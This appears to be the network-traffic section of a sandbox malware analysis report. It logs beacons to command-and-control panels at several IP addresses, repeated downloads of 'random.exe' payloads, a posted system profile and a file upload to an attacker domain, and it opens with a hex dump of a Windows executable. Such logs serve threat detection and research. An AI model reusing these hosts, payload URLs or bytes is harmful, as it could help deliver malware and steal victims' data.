00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 01:18:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/Krokodyl02/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019800001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019801001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019802001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019803001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /files/kardanvalov88/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019804001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019805001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1Host: home.fivetk5sb.topAccept: /Content-Type: application/jsonContent-Length: 467287Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 36 36 35 38 38 33 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019806001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /niCGMfnfOxUBXxpLhBBB1734796753?argument=sqcim1nDAay1ts2z1734830229 HTTP/1.1Host: home.fivetk5sb.topAccept: /
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019807001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019808001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5sb.topAccept: /Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------3Hmb0Xz54igKmXytiHgVfoData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 48 6d 62 30 58 7a 35 34 69 67 4b 6d 58 79 74 69 48 67 56 66 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 61 68 69 63 6f 68 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0b b3 05 ba 73 48 ad 01 6e bb fb e0 d9 b6 f5 c5 cd 81 ac 5b c2 9a 4a b9 ee dc 78 7b 01 2e cc 4a 24 16 4c 34 7e c8 8f 31 c6 5d 5e 59 25 bc f3 54 8c 89 be a4 19 75 f5 f4 a7 2c f9 34 2b e1 e4 8e 8e 0e ce ee b6 6f 2a 23 0a e1 56 45 8a 16 7a ed 43 e0 5a 3b 48 81 26 05 d1 3c ff ff db 00 24 04 07 67 ad 5f 57 c7 1b bb 86 e3 4c 83 88 5f 60 09 fa 09 17 39 a3 e9 eb 4e 21 01 be 17 45 e9 0d 70 84 a2 12 7c f7 96 31 9f 5c 1d 19 bb 79 c0 a5 08 f3 29 6a aa d4 e8 d7 42 cf f7 ab a4 7e 69 34 d0 60 8c 14 21 af 98 eb 63 37 92 13 26 2a 81 10 05 ac 67 8b 8d 26 e4 4b c3 0f 06 2c a3 18 dc 15 8a 37 17 50 66 a8 c6 ab fc b8 60 ee d4 19 fc 06 78 10 04 81 9a 1d 38 21 78 dc 10 71 4a 11 b9 94 b8 c5 e4 49 c0 ab cb c2 16 72 99 c2 2a cd 41 9c 2d a0 8f 3f 8b 6a c1 2a 17 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 48 6d 62 30 58 7a 35 34 69 67 4b 6d 58 79 74 69 48 67 56 66 6f 2d 2d 0d 0a Data Ascii: --------------------------3Hmb0Xz54igKmXytiHgVfoContent-Disposition: form-data; name="file"; filename="Zahicoha.bin"Content-Type: application/octet-streamsHn[Jx{.J$L4~1]^Y%Tu,4+o#VEzCZ;H&<$g_WL_`9N!Ep\|1\y)jB~i4`!c7&g&K,7Pf`x8!xqJIrA-?j--------------------------3Hmb0Xz54igKmXytiHgVfo--
